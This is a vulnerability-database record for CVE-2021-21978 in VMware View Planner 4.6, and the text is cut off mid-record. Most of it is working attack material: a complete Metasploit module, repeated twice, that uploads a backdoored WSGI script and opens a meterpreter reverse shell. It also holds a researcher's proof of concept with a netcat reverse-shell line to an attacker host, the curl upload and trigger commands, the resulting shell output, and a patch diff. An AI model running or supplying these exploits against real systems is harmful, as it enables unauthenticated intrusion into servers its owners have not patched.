VMware View Planner 4.6 Remote Code Execution

2021-03-19T00:00:00

Description

{"id": "PACKETSTORM:161879", "type": "packetstorm", "bulletinFamily": "exploit", "title": "VMware View Planner 4.6 Remote Code Execution", "description": "", "published": "2021-03-19T00:00:00", "modified": "2021-03-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html", "reporter": "wvu", "references": [], "cvelist": ["CVE-2021-21978"], "lastseen": "2021-03-19T17:09:26", "viewCount": 322, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:EB5B0C32-6562-4AE0-88C2-B251A8414685"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0148"]}, {"type": "cve", "idList": ["CVE-2021-21978"]}, {"type": "githubexploit", "idList": ["0DF255CC-57A4-520A-B262-852C932A5B1A", "3CA150A7-76FA-566E-A65C-9CE92B0C857A", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "A5396B72-7F7D-5109-9A41-571016422FB5", "F5339382-9321-5B96-934D-B803353CC9E3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C"]}, {"type": "vmware", "idList": ["VMSA-2021-0003"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdt", "idList": ["1337DAY-ID-35998"]}], "rev": 4}, "score": {"value": 7.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:EB5B0C32-6562-4AE0-88C2-B251A8414685"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0148"]}, {"type": "cve", "idList": ["CVE-2021-21978"]}, {"type": "githubexploit", "idList": ["0DF255CC-57A4-520A-B262-852C932A5B1A", "3CA150A7-76FA-566E-A65C-9CE92B0C857A", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "A5396B72-7F7D-5109-9A41-571016422FB5", "F5339382-9321-5B96-934D-B803353CC9E3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdt", "idList": ["1337DAY-ID-35998"]}]}, "exploitation": null, "vulnersScore": 7.4}, "sourceHref": "https://packetstormsecurity.com/files/download/161879/vmware_view_planner_4_6_uploadlog_rce.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE', \n'Description' => %q{ \nThis module exploits an unauthenticated log file upload within the \nlog_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 \nSecurity Patch 1. \n \nSuccessful exploitation will result in RCE as the apache user inside \nthe appacheServer Docker container. \n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu', # Analysis and PoC \n'Grant Willcox' # Metasploit Module \n], \n'References' => [ \n['CVE', '2021-21978'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'], \n['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC \n], \n'DisclosureDate' => '2021-03-02', # Vendor advisory \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'python', \n'Targets' => [ \n[ \n'VMware View Planner 4.6.0', \n{ \n'Arch' => ARCH_PYTHON, \n'Type' => :linux_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_tcp' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nunless res.code == 200 && !res.body.empty? \nreturn CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.') \nend \n \n@original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration. \n \nif res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:') \nreturn CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\") \nend \n \nCheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!') \nend \n \n# We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file. \n# As the code for both is the same, minus the content of the file, this is a generic function to handle that. \ndef upload_file(content) \nmime = Rex::MIME::Message.new \nmime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\") \nmime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'logupload'), \n'ctype' => \"multipart/form-data; boundary=#{mime.bound}\", \n'data' => mime.to_s \n) \nunless res.to_s.include?('File uploaded successfully.') \nfail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\") \nend \nend \n \ndef exploit \n# Here we want to grab our template file, taken from a clean install but \n# with a backdoor section added to it, and then fill in the PAYLOAD placeholder \n# with the payload we want to execute. \ndata_dir = File.join(Msf::Config.data_directory, 'exploits', shortname) \nfile_content = File.read(File.join(data_dir, 'log_upload_wsgi.py')) \n \npayload.encoded.gsub!(/\"/, '\\\\\"') \nfile_content['PAYLOAD'] = payload.encoded \n \n# Now that things are primed, upload the file to the target. \nprint_status('Uploading backdoor to system via the arbitrary file upload vulnerability!') \nupload_file(file_content) \nprint_good('Backdoor uploaded!') \n \n# Use the OPTIONS request to trigger the backdoor. Technically this \n# could be any other method including invalid ones like BACKDOOR, but for \n# the purposes of stealth lets use a legitimate one. \nprint_status('Sending request to execute the backdoor!') \nsend_request_cgi( \n'method' => 'OPTIONS', \n'uri' => normalize_uri(target_uri.path, 'logupload') \n) \nensure \n# At this point we should have our shell after waiting a few seconds, \n# so lets now restore the original file so we don't leave anything behind. \nprint_status('Reuploading the original code to remove the backdoor!') \nupload_file(@original_content) \nprint_good('Original file restored, enjoy the shell!') \nend \nend \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646183728}}

{"attackerkb": [{"lastseen": "2021-10-04T22:44:00", "description": "VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 04, 2021 3:30am UTC reported:\n\nQuick patch diff below. Note the added auth and path traversal protection.\n \n \n --- log_upload_wsgi.unpatched.py\t2021-03-03 20:18:16.000000000 -0600\n +++ log_upload_wsgi.patched.py\t2021-03-03 20:18:24.000000000 -0600\n @@ -1,104 +1,129 @@\n #! /usr/bin/env python3\n import cgi\n import os,sys\n import logging\n import json\n +import configparser\n +import hashlib\n \n WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME = \"workload_log_{}.zip\"\n \n class LogFileJson:\n \"\"\" Defines format to upload log file in harness\n \n Arguments:\n itrLogPath : log path provided by harness to store log data\n logFileType : Type of log file defined in api.agentlogFileType\n workloadID [OPTIONAL] : workload id, if log file is workload specific\n \n \"\"\"\n def __init__(self, itrLogPath, logFileType, workloadID = None):\n self.itrLogPath = itrLogPath\n self.logFileType = logFileType\n self.workloadID = workloadID\n \n def to_json(self):\n return json.dumps(self.__dict__)\n \n @classmethod\n def from_json(cls, json_str):\n json_dict = json.loads(json_str)\n return cls(**json_dict)\n \n class agentlogFileType():\n \"\"\" Defines various log file types to be uploaded by agent\n \n \"\"\"\n WORKLOAD_ZIP_LOG = \"workloadLogsZipFile\"\n \n try:\n # TO DO: Puth path in some config\n logging.basicConfig(filename=\"/etc/httpd/html/logs/uploader.log\",filemode='a', level=logging.ERROR)\n except:\n # In case write permission is not available in log folder.\n pass\n \n logger = logging.getLogger('log_upload_wsgi.py')\n \n def application(environ, start_response):\n logger.debug(\"application called\")\n \n + # TO DO: Puth path in some config or read from config is already available\n + resultBasePath = \"/etc/httpd/html/vpresults\"\n + config_path = \"/etc/httpd/conf/wsgi_config/wsgi.config\"\n + # Reading configuration\n + try:\n + config = configparser.ConfigParser()\n + config.read(config_path)\n + secret_key = config[\"apache\"][\"key\"].strip()\n + except Exception as e:\n + body = u\"Exception {}\".format(str(e))\n + start_response(\n + '400 fail',\n + [\n + ('Content-type', 'text/html; charset=utf8'),\n + ('Content-Length', str(len(body))),\n + ]\n + )\n + return [body.encode('utf8')]\n +\n if environ['REQUEST_METHOD'] == 'POST':\n post = cgi.FieldStorage(\n fp=environ['wsgi.input'],\n environ=environ,\n keep_blank_values=True\n )\n - # TO DO: Puth path in some config or read from config is already available\n - resultBasePath = \"/etc/httpd/html/vpresults\"\n try:\n filedata = post[\"logfile\"]\n metaData = post[\"logMetaData\"]\n -\n - if metaData.value:\n - logFileJson = LogFileJson.from_json(metaData.value)\n -\n - if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):\n - os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))\n -\n - if filedata.file:\n - if (logFileJson.logFileType == agentlogFileType.WORKLOAD_ZIP_LOG):\n - filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME.format(str(logFileJson.workloadID)))\n - else:\n - filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)\n - with open(filePath, 'wb') as output_file:\n - while True:\n - data = filedata.file.read(1024)\n - # End of file\n - if not data:\n - break\n - output_file.write(data)\n -\n - body = u\" File uploaded successfully.\"\n - start_response(\n - '200 OK',\n - [\n - ('Content-type', 'text/html; charset=utf8'),\n - ('Content-Length', str(len(body))),\n - ]\n - )\n - return [body.encode('utf8')]\n + password = post[\"password\"]\n + if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:\n + if metaData.value:\n + logFileJson = LogFileJson.from_json(metaData.value)\n +\n + dir_path = os.path.normpath(os.path.join(resultBasePath, logFileJson.itrLogPath))\n + if not os.path.exists(dir_path) and dir_path.startswith(resultBasePath):\n + os.makedirs(dir_path)\n +\n + if filedata.file:\n + if (logFileJson.logFileType == agentlogFileType.WORKLOAD_ZIP_LOG):\n + filePath = os.path.join(dir_path, WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME.format(str(logFileJson.workloadID)))\n + else:\n + filePath = os.path.join(dir_path, logFileJson.logFileType)\n +\n + filePath = os.path.normpath(filePath)\n + if filePath.startswith(resultBasePath):\n + with open(filePath, 'wb') as output_file:\n + while True:\n + data = filedata.file.read(1024)\n + # End of file\n + if not data:\n + break\n + output_file.write(data)\n +\n + body = u\" File uploaded successfully.\"\n + start_response(\n + '200 OK',\n + [\n + ('Content-type', 'text/html; charset=utf8'),\n + ('Content-Length', str(len(body))),\n + ]\n + )\n + return [body.encode('utf8')]\n \n except Exception as e:\n logger.error(\"Exception {}\".format(str(e)))\n body = u\"Exception {}\".format(str(e))\n else:\n logger.error(\"Invalid request\")\n body = u\"Invalid request\"\n \n + body = u\"Invalid request\"\n start_response(\n '400 fail',\n [\n ('Content-type', 'text/html; charset=utf8'),\n ('Content-Length', str(len(body))),\n ]\n )\n return [body.encode('utf8')]\n \n\nI have reproduced RCE with a personal PoC. I\u2019m not sure about the \u201csecret key\u201d they added, but I think it\u2019s changed as part of the update.\n \n \n wvu@kharak:~/Downloads/vp_4.6_sp1/harness$ cat wsgi.config\n [apache]\n key = vmware-viewplanner-ca$hc0w\n wvu@kharak:~/Downloads/vp_4.6_sp1/harness$\n \n\nWe\u2019ll see once I find time to test the patched version. I can confirm that RCE is within a Docker container. I haven\u2019t looked for LPE yet.\n\n**ETA: Someone else [released their PoC](<https://twitter.com/osama_hroot/status/1367258907601698816>), so here is mine in full:**\n \n \n wvu@kharak:~/Downloads$ curl -kO https://192.168.123.183/wsgi_log_upload/log_upload_wsgi.py\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n 100 3596 100 3596 0 0 121k 0 --:--:-- --:--:-- --:--:-- 121k\n wvu@kharak:~/Downloads$ cp log_upload_wsgi.py log_upload_wsgi.py.bak\n wvu@kharak:~/Downloads$ vi log_upload_wsgi.py\n wvu@kharak:~/Downloads$ diff -u log_upload_wsgi.py.bak log_upload_wsgi.py\n --- log_upload_wsgi.py.bak\t2021-03-04 17:41:15.000000000 -0600\n +++ log_upload_wsgi.py\t2021-03-04 17:41:35.000000000 -0600\n @@ -90,6 +90,8 @@\n except Exception as e:\n logger.error(\"Exception {}\".format(str(e)))\n body = u\"Exception {}\".format(str(e))\n + elif environ[\"REQUEST_METHOD\"] == \"HACK\":\n + os.system(\"mkfifo /tmp/hmwfq; nc 192.168.123.1 4444 0</tmp/hmwfq | /bin/sh >/tmp/hmwfq 2>&1; rm /tmp/hmwfq\")\n else:\n logger.error(\"Invalid request\")\n body = u\"Invalid request\"\n wvu@kharak:~/Downloads$ curl -k https://192.168.123.183/logupload -F logfile=@log_upload_wsgi.py -F 'logMetaData={\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}'\n File uploaded successfully.wvu@kharak:~/Downloads$ curl -kX HACK https://192.168.123.183/logupload\n ^C\n wvu@kharak:~/Downloads$ curl -k https://192.168.123.183/logupload -F \"logfile=@log_upload_wsgi.py.bak; filename=log_upload_wsgi.py\" -F 'logMetaData={\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}'\n File uploaded successfully.wvu@kharak:~/Downloads$\n \n \n \n msf6 exploit(multi/handler) > run\n \n [+] mkfifo /tmp/hmwfq; nc 192.168.123.1 4444 0</tmp/hmwfq | /bin/sh >/tmp/hmwfq 2>&1; rm /tmp/hmwfq\n [*] Started reverse TCP handler on 192.168.123.1:4444\n [*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.183:57562) at 2021-03-04 17:41:59 -0600\n \n id\n uid=25(apache) gid=25(apache) groups=25(apache),\n uname -a\n Linux 8cfebb27995a 4.9.137-1.ph2 #1-photon SMP Tue Nov 20 14:26:55 UTC 2018 x86_64\n \n\nETA: Here\u2019s the decompiled update script:\n \n \n import sys, os, configparser, shutil, time\n cwd = os.path.dirname(os.path.realpath(__file__))\n sys.path.append(cwd)\n import change_password\n print('Starting Update')\n wsgi_path_old = '/root/viewplanner/httpd/wsgi_log_upload/'\n wsgi_path_new = '/root/viewplanner/log_upload_app'\n wsgi_file = 'log_upload_wsgi.py'\n config_path = '/root/viewplanner/apache_config/wsgi_config'\n version_file = '/root/viewplanner/version.txt'\n httpd_conf_path = '/root/viewplanner/apache_config/httpd.conf'\n try:\n print('Updating config')\n if not os.path.exists(config_path):\n os.makedirs(config_path)\n os.system('cp ' + os.path.join(cwd, 'wsgi.config') + ' ' + config_path)\n except Exception as e:\n print('Updating config Failed!! {}'.format(e))\n sys.exit(1)\n \n try:\n print('Updating wsgi')\n if not os.path.exists(wsgi_path_new):\n os.makedirs(wsgi_path_new)\n shutil.copy(os.path.join(cwd, wsgi_file), wsgi_path_new)\n httpd_conf = ''\n with open(httpd_conf_path, 'r') as (fp):\n httpd_conf = fp.read()\n os.system('chmod -R o+x ' + wsgi_path_new)\n httpd_conf = httpd_conf.replace('WSGIScriptAlias /logupload /etc/httpd/html/wsgi_log_upload/log_upload_wsgi.py', '<Directory /root/app>\\n Require all granted\\n</Directory>\\nWSGIScriptAlias /logupload /root/app/log_upload_wsgi.py')\n with open(httpd_conf_path, 'w') as (fp):\n fp.write(httpd_conf)\n os.system('docker rm -f appacheServer')\n if os.path.exists(wsgi_path_old):\n shutil.rmtree(wsgi_path_old)\n os.system('docker run --restart on-failure --name appacheServer -p 80:80 -p 443:443 -v /root/viewplanner/apache_config:/etc/httpd/conf -v ' + wsgi_path_new + ':/root/app -v /root/viewplanner/httpd:/etc/httpd/html -d httpd_python_wsgi:1.0')\n time.sleep(10)\n os.system('docker exec -it appacheServer chmod a+x /root')\n os.system('docker restart appacheServer')\n os.system('docker exec -it appacheServer chmod -R 777 /etc/httpd/html')\n os.system('docker exec -it appacheServer chmod -R 777 /etc/httpd/conf/wsgi_config/wsgi.config')\n os.system('chmod -R o+x ' + config_path)\n os.system('chmod 644 ' + os.path.join(config_path, 'wsgi.config'))\n except Exception as e:\n print('Updating wsgi location failed!! {}'.format(e))\n sys.exit(1)\n \n change_password.set_password()\n try:\n print('Updating version')\n current_version = ''\n with open(version_file, 'r') as (fp):\n current_version = fp.read()\n if '-sp1' not in current_version:\n current_version = current_version + '-sp1'\n with open(version_file, 'w') as (fp):\n fp.write(current_version)\n except Exception as e:\n print('Updating version failed!! {}'.format(e))\n sys.exit(1)\n \n print('Update Completed')\n \n\nAnd the password script\u2026\n \n \n import sys, hashlib, configparser, getpass, hashlib\n config_file = '/root/viewplanner/apache_config/wsgi_config/wsgi.config'\n try:\n config = configparser.ConfigParser()\n config.read(config_file)\n except Exception as e:\n body = 'Exception {}'.format(str(e))\n sys.exit(1)\n \n def verify_current():\n password = getpass.getpass(prompt='Enter current Password: ')\n if hashlib.sha256(password.encode('utf8')).hexdigest() != config['apache']['key']:\n return False\n else:\n return True\n \n \n def set_password():\n password = getpass.getpass(prompt='Enter new Password: ')\n re_password = getpass.getpass(prompt='Re-enter new Password: ')\n if password != re_password:\n print('Password mismatch!!!')\n sys.exit(1)\n try:\n hashed_password = hashlib.sha256(password.encode('utf8')).hexdigest()\n except Exception as e:\n print('Password Update failed!!! {}'.format(e))\n sys.exit(1)\n \n try:\n config['apache']['key'] = hashed_password\n with open(config_file, 'w') as (fp):\n config.write(fp)\n except Exception as e:\n config.add_section('apache')\n config.set('apache', 'key', hashed_password)\n with open(config_file, 'w') as (fp):\n config.write(fp)\n \n print('Password changed successfully')\n \n \n if __name__ == '__main__':\n if not verify_current():\n print('Failed to verify password!!!')\n else:\n set_password()\n \n\nStill haven\u2019t found time to test the patch, but it\u2019s in **@gwillcox-r7**\u2019s good hands now!\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-21978", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-11T00:00:00", "id": "AKB:EB5B0C32-6562-4AE0-88C2-B251A8414685", "href": "https://attackerkb.com/comments/b5dd1a09-2f69-4497-9196-b4701d5a8db0", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:14", "description": "A remote code execution vulnerability exists in VMware View Planner. The vulnerability is due to improper validation of HTTP request to logupload endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T00:00:00", "type": "checkpoint_advisories", "title": "VMware View Planner Remote Code Execution (CVE-2021-21978)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-14T00:00:00", "id": "CPAI-2021-0148", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-21T21:20:59", "description": "This Metasploit module exploits an unauthenticated log file upload within the log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 Security Patch 1. Successful exploitation will result in remote code execution as the apache user inside the appacheServer Docker container.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-19T00:00:00", "type": "zdt", "title": "VMware View Planner 4.6 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-19T00:00:00", "id": "1337DAY-ID-35998", "href": "https://0day.today/exploit/description/35998", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated log file upload within the\n log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6\n Security Patch 1.\n\n Successful exploitation will result in RCE as the apache user inside\n the appacheServer Docker container.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and PoC\n 'Grant Willcox' # Metasploit Module\n ],\n 'References' => [\n ['CVE', '2021-21978'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'],\n ['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC\n ],\n 'DisclosureDate' => '2021-03-02', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'python',\n 'Targets' => [\n [\n 'VMware View Planner 4.6.0',\n {\n 'Arch' => ARCH_PYTHON,\n 'Type' => :linux_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_tcp'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n unless res.code == 200 && !res.body.empty?\n return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')\n end\n\n @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.\n\n if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:')\n return CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\")\n end\n\n CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')\n end\n\n # We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.\n # As the code for both is the same, minus the content of the file, this is a generic function to handle that.\n def upload_file(content)\n mime = Rex::MIME::Message.new\n mime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\")\n mime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'logupload'),\n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\",\n 'data' => mime.to_s\n )\n unless res.to_s.include?('File uploaded successfully.')\n fail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\")\n end\n end\n\n def exploit\n # Here we want to grab our template file, taken from a clean install but\n # with a backdoor section added to it, and then fill in the PAYLOAD placeholder\n # with the payload we want to execute.\n data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)\n file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py'))\n\n payload.encoded.gsub!(/\"/, '\\\\\"')\n file_content['PAYLOAD'] = payload.encoded\n\n # Now that things are primed, upload the file to the target.\n print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')\n upload_file(file_content)\n print_good('Backdoor uploaded!')\n\n # Use the OPTIONS request to trigger the backdoor. Technically this\n # could be any other method including invalid ones like BACKDOOR, but for\n # the purposes of stealth lets use a legitimate one.\n print_status('Sending request to execute the backdoor!')\n send_request_cgi(\n 'method' => 'OPTIONS',\n 'uri' => normalize_uri(target_uri.path, 'logupload')\n )\n ensure\n # At this point we should have our shell after waiting a few seconds,\n # so lets now restore the original file so we don't leave anything behind.\n print_status('Reuploading the original code to remove the backdoor!')\n upload_file(@original_content)\n print_good('Original file restored, enjoy the shell!')\n end\nend\n", "sourceHref": "https://0day.today/exploit/35998", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2022-06-19T20:01:46", "description": "3\\. Advisory Details \n\nVMware View Planner contains a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.6.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "vmware", "title": "VMware View Planner update addresses remote code execution vulnerability (CVE-2021-21978)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 